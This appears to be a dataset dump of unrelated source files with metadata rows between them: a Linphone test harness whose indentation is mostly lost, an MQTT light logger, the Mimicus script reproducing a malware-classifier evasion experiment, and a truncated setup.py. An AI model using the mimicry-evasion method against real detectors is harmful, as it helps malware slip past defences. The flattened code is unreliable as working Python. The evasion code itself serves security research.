linphonetester_logger.info("[TESTER] No account for {identity} exists, going to create one.".format(identity=id_addr.as_string()))
account = Account(id_addr, self.unique_id)
self.accounts.append(account)
create_account = True
cfg.identity_address = account.modified_identity
if create_account:
self._create_account_on_server(account, cfg)
ai = linphone.AuthInfo.new(account.modified_identity.username, None, account.password, None, None, account.modified_identity.domain)
lc.add_auth_info(ai)
return account.modified_identity
def _get_account(self, id_addr):
for account in self.accounts:
if account.identity.weak_equal(id_addr):
return account
return None
def _create_account_on_server(self, account, refcfg):
vtable = {}
tmp_identity = account.modified_identity.clone()
vtable['registration_state_changed'] = AccountManager.account_created_on_server_cb
vtable['auth_info_requested'] = AccountManager.account_created_auth_requested_cb
lc = CoreManager.configure_lc_from(vtable, tester_resources_path, None, account)
lc.sip_transports = linphone.SipTransports(-1, -1, -1, -1)
cfg = lc.create_proxy_config()
tmp_identity.password = account.password
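        # The X-Create-Account header asks the test SIP server to provision
        # this account on the fly (assumption: the auto-provisioning hook used
        # by the liblinphone test infrastructure).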
tmp_identity.set_header("X-Create-Account", "yes")
cfg.identity_address = tmp_identity
server_addr = linphone.Address.new(refcfg.server_addr)
        server_addr.transport = linphone.TransportType.Tcp
server_addr.port = 0
cfg.server_addr = server_addr.as_string()
cfg.expires = 3600
lc.add_proxy_config(cfg)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().auth_requested == True, 10000) != True:
linphonetester_logger.critical("[TESTER] Account for {identity} could not be created on server.".format(identity=refcfg.identity_address.as_string()))
sys.exit(-1)
cfg.edit()
cfg.identity_address = account.modified_identity
cfg.done()
ai = linphone.AuthInfo.new(account.modified_identity.username, None, account.password, None, None, account.modified_identity.domain)
lc.add_auth_info(ai)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().created == True, 3000) != True:
linphonetester_logger.critical("[TESTER] Account for {identity} is not working on server.".format(identity=refcfg.identity_address.as_string()))
sys.exit(-1)
lc.remove_proxy_config(cfg)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().done == True, 3000) != True:
linphonetester_logger.critical("[TESTER] Account creation could not clean the registration context.")
sys.exit(-1)
account_manager = AccountManager()
class CoreManagerStats:
def __init__(self):
self.reset()
def reset(self):
self.number_of_LinphoneRegistrationNone = 0
self.number_of_LinphoneRegistrationProgress = 0
self.number_of_LinphoneRegistrationOk = 0
self.number_of_LinphoneRegistrationCleared = 0
self.number_of_LinphoneRegistrationFailed = 0
self.number_of_auth_info_requested = 0
self.number_of_LinphoneCallIncomingReceived = 0
self.number_of_LinphoneCallOutgoingInit = 0
self.number_of_LinphoneCallOutgoingProgress = 0
self.number_of_LinphoneCallOutgoingRinging = 0
self.number_of_LinphoneCallOutgoingEarlyMedia = 0
self.number_of_LinphoneCallConnected = 0
self.number_of_LinphoneCallStreamsRunning = 0
self.number_of_LinphoneCallPausing = 0
self.number_of_LinphoneCallPaused = 0
self.number_of_LinphoneCallResuming = 0
self.number_of_LinphoneCallRefered = 0
self.number_of_LinphoneCallError = 0
self.number_of_LinphoneCallEnd = 0
self.number_of_LinphoneCallPausedByRemote = 0
self.number_of_LinphoneCallUpdatedByRemote = 0
self.number_of_LinphoneCallIncomingEarlyMedia = 0
self.number_of_LinphoneCallUpdating = 0
self.number_of_LinphoneCallReleased = 0
self.number_of_LinphoneTransferCallOutgoingInit = 0
self.number_of_LinphoneTransferCallOutgoingProgress = 0
self.number_of_LinphoneTransferCallOutgoingRinging = 0
self.number_of_LinphoneTransferCallOutgoingEarlyMedia = 0
self.number_of_LinphoneTransferCallConnected = 0
self.number_of_LinphoneTransferCallStreamsRunning = 0
self.number_of_LinphoneTransferCallError = 0
self.number_of_LinphoneMessageReceived = 0
self.number_of_LinphoneMessageReceivedWithFile = 0
self.number_of_LinphoneMessageReceivedLegacy = 0
self.number_of_LinphoneMessageExtBodyReceived = 0
self.number_of_LinphoneMessageInProgress = 0
self.number_of_LinphoneMessageDelivered = 0
self.number_of_LinphoneMessageNotDelivered = 0
self.number_of_LinphoneIsComposingActiveReceived = 0
self.number_of_LinphoneIsComposingIdleReceived = 0
self.number_of_LinphoneFileTransferDownloadSuccessful = 0
self.progress_of_LinphoneFileTransfer = 0
self.number_of_IframeDecoded = 0
self.number_of_NewSubscriptionRequest =0
self.number_of_NotifyReceived = 0
self.number_of_LinphonePresenceActivityOffline = 0
self.number_of_LinphonePresenceActivityOnline = 0
self.number_of_LinphonePresenceActivityAppointment = 0
self.number_of_LinphonePresenceActivityAway = 0
self.number_of_LinphonePresenceActivityBreakfast = 0
self.number_of_LinphonePresenceActivityBusy = 0
self.number_of_LinphonePresenceActivityDinner = 0
self.number_of_LinphonePresenceActivityHoliday = 0
self.number_of_LinphonePresenceActivityInTransit = 0
self.number_of_LinphonePresenceActivityLookingForWork = 0
self.number_of_LinphonePresenceActivityLunch = 0
self.number_of_LinphonePresenceActivityMeal = 0
self.number_of_LinphonePresenceActivityMeeting = 0
self.number_of_LinphonePresenceActivityOnThePhone = 0
self.number_of_LinphonePresenceActivityOther = 0
self.number_of_LinphonePresenceActivityPerformance = 0
self.number_of_LinphonePresenceActivityPermanentAbsence = 0
self.number_of_LinphonePresenceActivityPlaying = 0
self.number_of_LinphonePresenceActivityPresentation = 0
self.number_of_LinphonePresenceActivityShopping = 0
self.number_of_LinphonePresenceActivitySleeping = 0
self.number_of_LinphonePresenceActivitySpectator = 0
self.number_of_LinphonePresenceActivitySteering = 0
self.number_of_LinphonePresenceActivityTravel = 0
self.number_of_LinphonePresenceActivityTV = 0
self.number_of_LinphonePresenceActivityUnknown = 0
self.number_of_LinphonePresenceActivityVacation = 0
self.number_of_LinphonePresenceActivityWorking = 0
self.number_of_LinphonePresenceActivityWorship = 0
self.last_received_presence = None
self.number_of_inforeceived = 0
self.number_of_LinphoneSubscriptionIncomingReceived = 0
self.number_of_LinphoneSubscriptionOutgoingInit = 0
self.number_of_LinphoneSubscriptionPending = 0
self.number_of_LinphoneSubscriptionActive = 0
self.number_of_LinphoneSubscriptionTerminated = 0
self.number_of_LinphoneSubscriptionError = 0
self.number_of_LinphoneSubscriptionExpiring = 0
self.number_of_LinphonePublishProgress = 0
self.number_of_LinphonePublishOk = 0
self.number_of_LinphonePublishExpiring = 0
self.number_of_LinphonePublishError = 0
self.number_of_LinphonePublishCleared = 0
self.number_of_LinphoneConfiguringSkipped = 0
self.number_of_LinphoneConfiguringFailed = 0
self.number_of_LinphoneConfiguringSuccessful = 0
self.number_of_LinphoneCallEncryptedOn = 0
self.number_of_LinphoneCallEncryptedOff = 0
self.last_received_chat_message = None
class CoreManager:
@classmethod
def configure_lc_from(cls, vtable, resources_path, rc_path, user_data=None):
filepath = None
if rc_path is not None:
filepath = os.path.join(resources_path, rc_path)
assert_equals(os.path.isfile(filepath), True)
lc = linphone.Core.new(vtable, None, filepath)
linphone.testing.set_dns_user_hosts_file(lc, os.path.join(resources_path, 'tester_hosts'))
lc.root_ca = os.path.join(resources_path, 'certificates', 'cn', 'cafile.pem')
lc.ring = os.path.join(resources_path, 'sounds', 'oldphone.wav')
lc.ringback = os.path.join(resources_path, 'sounds', 'ringback.wav')
lc.static_picture = os.path.join(resources_path, 'images', 'nowebcamCIF.jpg')
lc.user_data = weakref.ref(user_data)
return lc
@classmethod
def wait_for_until(cls, manager1, manager2, func, timeout):
managers = []
if manager1 is not None:
managers.append(manager1)
if manager2 is not None:
managers.append(manager2)
return cls.wait_for_list(managers, func, timeout)
@classmethod
def wait_for_list(cls, managers, func, timeout):
start = datetime.now()
end = start + timedelta(milliseconds = timeout)
res = func(*managers)
while not res and datetime.now() < end:
for manager in managers:
manager.lc.iterate()
time.sleep(0.02)
res = func(*managers)
return res
@classmethod
def wait_for(cls, manager1, manager2, func):
return cls.wait_for_until(manager1, manager2, func, 10000)
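    # Example predicate (illustrative), mirroring end_call below: wait until
    # both managers have each counted one LinphoneCallEnd event:
    #   CoreManager.wait_for(mgr_a, mgr_b,
    #       lambda a, b: a.stats.number_of_LinphoneCallEnd == 1 and
    #                    b.stats.number_of_LinphoneCallEnd == 1)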
@classmethod
def call(cls, caller_manager, callee_manager, caller_params = None, callee_params = None, build_callee_params = False):
initial_caller_stats = deepcopy(caller_manager.stats)
initial_callee_stats = deepcopy(callee_manager.stats)
# Use playfile for callee to avoid locking on capture card
callee_manager.lc.use_files = True
callee_manager.lc.play_file = os.path.join(tester_resources_path, 'sounds', 'hello8000.wav')
if caller_params is None:
call = caller_manager.lc.invite_address(callee_manager.identity)
else:
call = caller_manager.lc.invite_address_with_params(callee_manager.identity, caller_params)
assert call is not None
assert_equals(CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: callee_manager.stats.number_of_LinphoneCallIncomingReceived == initial_callee_stats.number_of_LinphoneCallIncomingReceived + 1), True)
assert_equals(callee_manager.lc.incoming_invite_pending, True)
assert_equals(caller_manager.stats.number_of_LinphoneCallOutgoingProgress, initial_caller_stats.number_of_LinphoneCallOutgoingProgress + 1)
retry = 0
while (caller_manager.stats.number_of_LinphoneCallOutgoingRinging != initial_caller_stats.number_of_LinphoneCallOutgoingRinging + 1) and \
(caller_manager.stats.number_of_LinphoneCallOutgoingEarlyMedia != initial_caller_stats.number_of_LinphoneCallOutgoingEarlyMedia + 1) and \
retry < 20:
retry += 1
caller_manager.lc.iterate()
callee_manager.lc.iterate()
time.sleep(0.1)
assert ((caller_manager.stats.number_of_LinphoneCallOutgoingRinging == initial_caller_stats.number_of_LinphoneCallOutgoingRinging + 1) or \
(caller_manager.stats.number_of_LinphoneCallOutgoingEarlyMedia == initial_caller_stats.number_of_LinphoneCallOutgoingEarlyMedia + 1)) == True
assert callee_manager.lc.current_call_remote_address is not None
if caller_manager.lc.current_call is None or callee_manager.lc.current_call is None or callee_manager.lc.current_call_remote_address is None:
return False
callee_from_address = caller_manager.identity.clone()
callee_from_address.port = 0 # Remove port because port is never present in from header
assert_equals(callee_from_address.weak_equal(callee_manager.lc.current_call_remote_address), True)
if callee_params is not None:
callee_manager.lc.accept_call_with_params(callee_manager.lc.current_call, callee_params)
elif build_callee_params:
default_params = callee_manager.lc.create_call_params(callee_manager.lc.current_call)
callee_manager.lc.accept_call_with_params(callee_manager.lc.current_call, default_params)
else:
callee_manager.lc.accept_call(callee_manager.lc.current_call)
assert_equals(CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: (callee_manager.stats.number_of_LinphoneCallConnected == initial_callee_stats.number_of_LinphoneCallConnected + 1) and \
(caller_manager.stats.number_of_LinphoneCallConnected == initial_caller_stats.number_of_LinphoneCallConnected + 1)), True)
# Just to sleep
result = CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: (callee_manager.stats.number_of_LinphoneCallStreamsRunning == initial_callee_stats.number_of_LinphoneCallStreamsRunning + 1) and \
(caller_manager.stats.number_of_LinphoneCallStreamsRunning == initial_caller_stats.number_of_LinphoneCallStreamsRunning + 1))
        if caller_manager.lc.media_encryption != linphone.MediaEncryption.None and callee_manager.lc.media_encryption != linphone.MediaEncryption.None:
# Wait for encryption to be on, in case of zrtp, it can take a few seconds
if caller_manager.lc.media_encryption == linphone.MediaEncryption.ZRTP:
CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: caller_manager.stats.number_of_LinphoneCallEncryptedOn == initial_caller_stats.number_of_LinphoneCallEncryptedOn + 1)
if callee_manager.lc.media_encryption == linphone.MediaEncryption.ZRTP:
CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: callee_manager.stats.number_of_LinphoneCallEncryptedOn == initial_callee_stats.number_of_LinphoneCallEncryptedOn + 1)
assert_equals(callee_manager.lc.current_call.current_params.media_encryption, caller_manager.lc.media_encryption)
assert_equals(caller_manager.lc.current_call.current_params.media_encryption, callee_manager.lc.media_encryption)
return result
@classmethod
def end_call(cls, caller_manager, callee_manager):
caller_manager.lc.terminate_all_calls()
assert_equals(CoreManager.wait_for(caller_manager, callee_manager,
lambda caller_manager, callee_manager: caller_manager.stats.number_of_LinphoneCallEnd == 1 and callee_manager.stats.number_of_LinphoneCallEnd == 1), True)
@classmethod
def registration_state_changed(cls, lc, cfg, state, message):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New registration state {state} for user id [{identity}] at proxy [{addr}]".format(
state=linphone.RegistrationState.string(state), identity=cfg.identity_address.as_string(), addr=cfg.server_addr))
if state == linphone.RegistrationState.None:
manager.stats.number_of_LinphoneRegistrationNone += 1
elif state == linphone.RegistrationState.Progress:
manager.stats.number_of_LinphoneRegistrationProgress += 1
elif state == linphone.RegistrationState.Ok:
manager.stats.number_of_LinphoneRegistrationOk += 1
elif state == linphone.RegistrationState.Cleared:
manager.stats.number_of_LinphoneRegistrationCleared += 1
elif state == linphone.RegistrationState.Failed:
manager.stats.number_of_LinphoneRegistrationFailed += 1
else:
raise Exception("Unexpected registration state")
@classmethod
def auth_info_requested(cls, lc, realm, username, domain):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] Auth info requested for user id [{username}] at realm [{realm}]".format(
username=username, realm=realm))
manager.stats.number_of_auth_info_requested +=1
@classmethod
def call_state_changed(cls, lc, call, state, msg):
manager = lc.user_data()
to_address = call.call_log.to_address.as_string()
from_address = call.call_log.from_address.as_string()
direction = "Outgoing"
if call.call_log.dir == linphone.CallDir.Incoming:
direction = "Incoming"
linphonetester_logger.info("[TESTER] {direction} call from [{from_address}] to [{to_address}], new state is [{state}]".format(
direction=direction, from_address=from_address, to_address=to_address, state=linphone.CallState.string(state)))
if state == linphone.CallState.IncomingReceived:
manager.stats.number_of_LinphoneCallIncomingReceived += 1
elif state == linphone.CallState.OutgoingInit:
manager.stats.number_of_LinphoneCallOutgoingInit += 1
elif state == linphone.CallState.OutgoingProgress:
manager.stats.number_of_LinphoneCallOutgoingProgress += 1
elif state == linphone.CallState.OutgoingRinging:
manager.stats.number_of_LinphoneCallOutgoingRinging += 1
elif state == linphone.CallState.OutgoingEarlyMedia:
manager.stats.number_of_LinphoneCallOutgoingEarlyMedia += 1
elif state == linphone.CallState.Connected:
manager.stats.number_of_LinphoneCallConnected += 1
elif state == linphone.CallState.StreamsRunning:
manager.stats.number_of_LinphoneCallStreamsRunning += 1
elif state == linphone.CallState.Pausing:
manager.stats.number_of_LinphoneCallPausing += 1
elif state == linphone.CallState.Paused:
manager.stats.number_of_LinphoneCallPaused += 1
elif state == linphone.CallState.Resuming:
manager.stats.number_of_LinphoneCallResuming += 1
elif state == linphone.CallState.Refered:
manager.stats.number_of_LinphoneCallRefered += 1
elif state == linphone.CallState.Error:
manager.stats.number_of_LinphoneCallError += 1
elif state == linphone.CallState.End:
manager.stats.number_of_LinphoneCallEnd += 1
elif state == linphone.CallState.PausedByRemote:
manager.stats.number_of_LinphoneCallPausedByRemote += 1
elif state == linphone.CallState.UpdatedByRemote:
manager.stats.number_of_LinphoneCallUpdatedByRemote += 1
elif state == linphone.CallState.IncomingEarlyMedia:
manager.stats.number_of_LinphoneCallIncomingEarlyMedia += 1
elif state == linphone.CallState.Updating:
manager.stats.number_of_LinphoneCallUpdating += 1
elif state == linphone.CallState.Released:
manager.stats.number_of_LinphoneCallReleased += 1
else:
raise Exception("Unexpected call state")
@classmethod
def message_received(cls, lc, room, message):
manager = lc.user_data()
from_str = message.from_address.as_string()
text_str = message.text
external_body_url = message.external_body_url
linphonetester_logger.info("[TESTER] Message from [{from_str}] is [{text_str}], external URL [{external_body_url}]".format(
from_str=from_str, text_str=text_str, external_body_url=external_body_url))
manager.stats.number_of_LinphoneMessageReceived += 1
manager.stats.last_received_chat_message = message
if message.file_transfer_information is not None:
manager.stats.number_of_LinphoneMessageReceivedWithFile += 1
elif message.external_body_url is not None:
manager.stats.number_of_LinphoneMessageExtBodyReceived += 1
@classmethod
def new_subscription_requested(cls, lc, lf, url):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New subscription request: from [{from_str}], url [{url}]".format(
from_str=lf.address.as_string(), url=url))
manager.stats.number_of_NewSubscriptionRequest += 1
lc.add_friend(lf) # Accept subscription
@classmethod
def notify_presence_received(cls, lc, lf):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New notify request: from [{from_str}]".format(
from_str=lf.address.as_string()))
manager.stats.number_of_NotifyReceived += 1
manager.stats.last_received_presence = lf.presence_model
acttype = manager.stats.last_received_presence.activity.type
if acttype == linphone.PresenceActivityType.Offline:
manager.stats.number_of_LinphonePresenceActivityOffline += 1
elif acttype == linphone.PresenceActivityType.Online:
manager.stats.number_of_LinphonePresenceActivityOnline += 1
elif acttype == linphone.PresenceActivityType.Appointment:
manager.stats.number_of_LinphonePresenceActivityAppointment += 1
elif acttype == linphone.PresenceActivityType.Away:
manager.stats.number_of_LinphonePresenceActivityAway += 1
elif acttype == linphone.PresenceActivityType.Breakfast:
manager.stats.number_of_LinphonePresenceActivityBreakfast += 1
elif acttype == linphone.PresenceActivityType.Busy:
manager.stats.number_of_LinphonePresenceActivityBusy += 1
elif acttype == linphone.PresenceActivityType.Dinner:
manager.stats.number_of_LinphonePresenceActivityDinner += 1
elif acttype == linphone.PresenceActivityType.Holiday:
manager.stats.number_of_LinphonePresenceActivityHoliday += 1
elif acttype == linphone.PresenceActivityType.InTransit:
manager.stats.number_of_LinphonePresenceActivityInTransit += 1
elif acttype == linphone.PresenceActivityType.LookingForWork:
manager.stats.number_of_LinphonePresenceActivityLookingForWork += 1
elif acttype == linphone.PresenceActivityType.Lunch:
manager.stats.number_of_LinphonePresenceActivityLunch += 1
elif acttype == linphone.PresenceActivityType.Meal:
manager.stats.number_of_LinphonePresenceActivityMeal += 1
elif acttype == linphone.PresenceActivityType.Meeting:
manager.stats.number_of_LinphonePresenceActivityMeeting += 1
elif acttype == linphone.PresenceActivityType.OnThePhone:
manager.stats.number_of_LinphonePresenceActivityOnThePhone += 1
elif acttype == linphone.PresenceActivityType.Other:
manager.stats.number_of_LinphonePresenceActivityOther += 1
elif acttype == linphone.PresenceActivityType.Performance:
manager.stats.number_of_LinphonePresenceActivityPerformance += 1
elif acttype == linphone.PresenceActivityType.PermanentAbsence:
manager.stats.number_of_LinphonePresenceActivityPermanentAbsence += 1
elif acttype == linphone.PresenceActivityType.Playing:
manager.stats.number_of_LinphonePresenceActivityPlaying += 1
elif acttype == linphone.PresenceActivityType.Presentation:
manager.stats.number_of_LinphonePresenceActivityPresentation += 1
elif acttype == linphone.PresenceActivityType.Shopping:
manager.stats.number_of_LinphonePresenceActivityShopping += 1
elif acttype == linphone.PresenceActivityType.Sleeping:
manager.stats.number_of_LinphonePresenceActivitySleeping += 1
elif acttype == linphone.PresenceActivityType.Spectator:
manager.stats.number_of_LinphonePresenceActivitySpectator += 1
elif acttype == linphone.PresenceActivityType.Steering:
manager.stats.number_of_LinphonePresenceActivitySteering += 1
elif acttype == linphone.PresenceActivityType.Travel:
manager.stats.number_of_LinphonePresenceActivityTravel += 1
elif acttype == linphone.PresenceActivityType.TV:
manager.stats.number_of_LinphonePresenceActivityTV += 1
elif acttype == linphone.PresenceActivityType.Unknown:
manager.stats.number_of_LinphonePresenceActivityUnknown += 1
elif acttype == linphone.PresenceActivityType.Vacation:
manager.stats.number_of_LinphonePresenceActivityVacation += 1
elif acttype == linphone.PresenceActivityType.Working:
manager.stats.number_of_LinphonePresenceActivityWorking += 1
elif acttype == linphone.PresenceActivityType.Worship:
manager.stats.number_of_LinphonePresenceActivityWorship += 1
def __init__(self, rc_file = None, check_for_proxies = True, vtable = {}):
if not vtable.has_key('registration_state_changed'):
vtable['registration_state_changed'] = CoreManager.registration_state_changed
if not vtable.has_key('auth_info_requested'):
vtable['auth_info_requested'] = CoreManager.auth_info_requested
if not vtable.has_key('call_state_changed'):
vtable['call_state_changed'] = CoreManager.call_state_changed
if not vtable.has_key('message_received'):
vtable['message_received'] = CoreManager.message_received
#if not vtable.has_key('is_composing_received'):
#vtable['is_composing_received'] = CoreManager.is_composing_received
if not vtable.has_key('new_subscription_requested'):
vtable['new_subscription_requested'] = CoreManager.new_subscription_requested
if not vtable.has_key('notify_presence_received'):
vtable['notify_presence_received'] = CoreManager.notify_presence_received
#if not vtable.has_key('transfer_state_changed'):
#vtable['transfer_state_changed'] = CoreManager.transfer_state_changed
#if not vtable.has_key('info_received'):
#vtable['info_received'] = CoreManager.info_received
#if not vtable.has_key('subscription_state_changed'):
#vtable['subscription_state_changed'] = CoreManager.subscription_state_changed
#if not vtable.has_key('notify_received'):
#vtable['notify_received'] = CoreManager.notify_received
#if not vtable.has_key('publish_state_changed'):
#vtable['publish_state_changed'] = CoreManager.publish_state_changed
#if not vtable.has_key('configuring_status'):
#vtable['configuring_status'] = CoreManager.configuring_status
#if not vtable.has_key('call_encryption_changed'):
#vtable['call_encryption_changed'] = CoreManager.call_encryption_changed
self.identity = None
self.stats = CoreManagerStats()
rc_path = None
if rc_file is not None:
rc_path = os.path.join('rcfiles', rc_file)
self.lc = CoreManager.configure_lc_from(vtable, tester_resources_path, rc_path, self)
self.check_accounts()
if check_for_proxies and rc_file is not None:
proxy_count = len(self.lc.proxy_config_list)
else:
proxy_count = 0
if proxy_count:
CoreManager.wait_for_until(self, None, lambda manager: manager.stats.number_of_LinphoneRegistrationOk == proxy_count, 5000 * proxy_count)
assert_equals(self.stats.number_of_LinphoneRegistrationOk, proxy_count)
self.enable_audio_codec("PCMU", 8000)
if self.lc.default_proxy_config is not None:
self.lc.default_proxy_config.identity_address.clean()
def enable_audio_codec(self, mime, rate):
codecs = self.lc.audio_codecs
for codec in codecs:
self.lc.enable_payload_type(codec, False)
codec = self.lc.find_payload_type(mime, rate, 1)
assert codec is not None
if codec is not None:
self.lc.enable_payload_type(codec, True)
def disable_all_audio_codecs_except_one(self, mime):
self.enable_audio_codec(mime, -1)
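    # Note: enable_audio_codec above first disables every codec and then enables
    # only the matching one, so this single call suffices; rate=-1 presumably
    # acts as a rate wildcard for find_payload_type.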
def check_accounts(self):
pcl = self.lc.proxy_config_list
for cfg in pcl:
self.identity = account_manager.check_account(cfg)
| gpl-2.0 | 337,906,858,719,774,660 | 50.825243 | 185 | 0.685213 | false | 3.788054 | true | false | false |
ItKindaWorks/ESP8266 | Home Automation/Part 2/MQTT_Logger.py | 1 | 2837 | #!/usr/bin/python
import sys
import os
import paho.mqtt.client as mqtt
import string
import datetime
import time
import logging
#keeps track of when we last turned the light on
onStartTime = 0
##############################
#Create and setup the logging subsystem
logger = None
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create a file handler
timeFormat = "%a %b %d %Y %H.%M.%S"
today = datetime.datetime.today()
timestamp = today.strftime(timeFormat)
logFile = 'logs/logs' + timestamp + '.log'
handler = logging.FileHandler(logFile)
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
##############################
def on_message(mqttc, obj, msg):
#define our global vars for logger and the start time tracker
global onStartTime
global logger
#get the local time in an easy to read format
localtime = time.asctime( time.localtime(time.time()) )
#print the message topic and payload for debugging
print msg.topic + " - " + msg.payload
#check to see that the topic is our light1confirm
#- not needed in this example because we are only subscribed to 1 topic as it is
#- but I prefer to play it safe
if (msg.topic == "/house/light1confirm"):
		#what to do if the message said that we turned the light On
if(msg.payload == "On"):
#take note of when we turned the light on
onStartTime = time.time()
#log the light on time and print
logMessage = "Light turned on at: " + localtime
print logMessage
logger.info(logMessage)
		#what to do if the message said that we turned the light Off
else:
#take note of the total run time
runTime = time.time() - onStartTime
#log & print when the light turned off
logMessage = "Light turned off at: " + localtime
print logMessage
logger.info(logMessage)
#log & print the total time the light was on for
logMessage = "The light was on for a total of " + str(int(runTime)) + " seconds"
print logMessage
logger.info(logMessage)
#create our MQTT client
mqttc = mqtt.Client()
#tell it what to do when we receive a message
mqttc.on_message = on_message
#connect to the broker (most likely it is localhost if running MQTT locally)
mqttc.connect("127.0.0.1", 1883, 60)
#subscribe to our light confirmation topic
mqttc.subscribe("/house/light1confirm", 0)
#start the MQTT client loop in a separate thread
mqttc.loop_start()
#just loop a bunch - yeah I know this is not the best way to do things
while(True):
time.sleep(1)
| cc0-1.0 | -2,661,853,086,497,558,500 | 26.019048 | 92 | 0.656327 | false | 3.838972 | false | false | false |
srndic/mimicus | reproduction/fig11.py | 1 | 5327 | #!/usr/bin/env python
'''
Copyright 2014 Nedim Srndic, University of Tuebingen
This file is part of Mimicus.
Mimicus is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mimicus is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mimicus. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
fig11.py
Reproduction of Figure 11 of the paper "Practical Evasion of a
Learning-Based Classifier: A Case Study" by Nedim Srndic and
Pavel Laskov.
Created on March 21, 2014.
'''
from argparse import ArgumentParser
import multiprocessing
import os
import random
import sys
from matplotlib import pyplot
from mimicus.tools.featureedit import FeatureEdit
from mimicus.tools.datasets import csv2numpy
import common
import config
def mimicry(wolf_fname, sheep_feats, m_id):
'''
Mimics file with the features sheep_feats using the attack file
with the name wolf_fname. Returns the resulting feature vector.
'''
mimic = FeatureEdit(wolf_fname).modify_file(sheep_feats, '/run/shm')
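    # The mimic is written under /run/shm (a tmpfs on typical Linux systems) and
    # removed immediately below; only the resulting feature vector is returned.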
os.remove(mimic['path'])
return mimic['feats'], m_id
def mimicry_wrap(args):
'''
Helper function for calling the mimicry function in parallel.
'''
return mimicry(*args)
def fig11(tr_data, tr_labels, te_data, te_labels, tr_files):
'''
Tests the vaccination defense against the Benign Random Noise (BRN)
attack seeded by results of our mimicry attack against itself and
original, unmodified data. Performs 5 trials.
'''
mal_tr_ind = [i for i, l in enumerate(tr_labels) if l == 1]
ben_tr_ind = [i for i, l in enumerate(tr_labels) if l == 0]
mim_data, mim_labels = common.get_FTC_mimicry()
TRIALS = 5
print '\n{:>6}{:>15}{:>15}'.format('%', 'ORIGINAL', 'OUR MIMICRY')
pool = multiprocessing.Pool(processes=None)
scores = []
for subset in (0, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1):
acc = [0.0, 0.0]
sys.stdout.write('{:>6.2f}'.format(subset * 100))
for _ in range(TRIALS):
tr_mod = tr_data.copy()
# Subsample malicious training files for attack
wolf_ind = random.sample(mal_tr_ind,
int(round(subset * len(mal_tr_ind))))
# Mimic random benign files using the sampled files
            pargs = [(tr_files[w_id], tr_data[random.choice(ben_tr_ind)], w_id)
for w_id in wolf_ind]
for mimic, w_id in pool.imap(mimicry_wrap, pargs):
tr_mod[w_id] = mimic
# Evaluate the classifier on both clean test data and mimicry data
res = common.evaluate_classifier(tr_mod,
tr_labels,
[te_data, mim_data],
[te_labels, mim_labels])
acc = [old + new for old, new in zip(acc, res)]
acc = [acc[0] / TRIALS, acc[1] / TRIALS]
print '{:>15.3f}{:>15.3f}'.format(acc[0], acc[1])
scores.append(tuple(acc))
return scores
def main():
random.seed(0)
parser = ArgumentParser()
parser.add_argument('--plot', help='Where to save plot (file name)',
default=False)
parser.add_argument('--show', help='Show plot in a window', default=False)
args = parser.parse_args()
print 'Loading training data from CSV...'
tr_data, tr_labels, tr_fnames = csv2numpy(config.get('datasets',
'contagio'))
print 'Loading test data from CSV...'
te_data, te_labels, _ = csv2numpy(config.get('datasets', 'contagio_test'))
print 'Evaluating...'
scores = fig11(tr_data, tr_labels, te_data, te_labels, tr_fnames)
if not (args.plot or args.show):
return 0
# Plot
original, our_mimicry = zip(*scores)
fig = pyplot.figure()
pyplot.plot(original,
label='Clean data',
marker='o', color='k', linewidth=2)
pyplot.plot(our_mimicry,
label='Our mimicry',
marker='+', color='k', linewidth=2, linestyle=':')
axes = fig.gca()
# Set up axes and labels
axes.yaxis.set_ticks([r / 10.0 for r in range(11)])
axes.yaxis.grid()
axes.set_ylim(0, 1)
axes.set_ylabel('Accuracy')
xticklabels = ['0', '0.05', '0.1', '0.5', '1', '5', '10', '50', '100']
axes.set_xticklabels(xticklabels, rotation=0)
axes.set_xlabel('Training set perturbation (%)')
fig.subplots_adjust(bottom=0.13, top=0.95, left=0.11, right=0.96)
pyplot.legend(loc='lower right')
if args.show:
pyplot.show()
if args.plot:
pyplot.savefig(args.plot, dpi=300, bbox_inches='tight')
return 0
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | -3,679,737,953,169,780,000 | 34.993243 | 80 | 0.594706 | false | 3.5 | false | false | false |
ernestyalumni/Propulsion | ccdroplet/setup.py | 1 | 1369 | from setuptools import setup, find_packages
from codecs import open
from os import path
__version__ = '0.0.1'
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if 'git+' not in x]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' in x]
setup(
name='ccdroplet',
version=__version__,
description='Convective Burning Droplet model for (rocket) Combustion Chambers.',
long_description=long_description,
url='https://github.com/ernestyalumni/Propulsion/ccdroplet',
download_url='https://github.com/ernestyalumni/Propulsion/ccdroplet/tarball/' + __version__,
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='Ernest Yeung',
install_requires=install_requires,
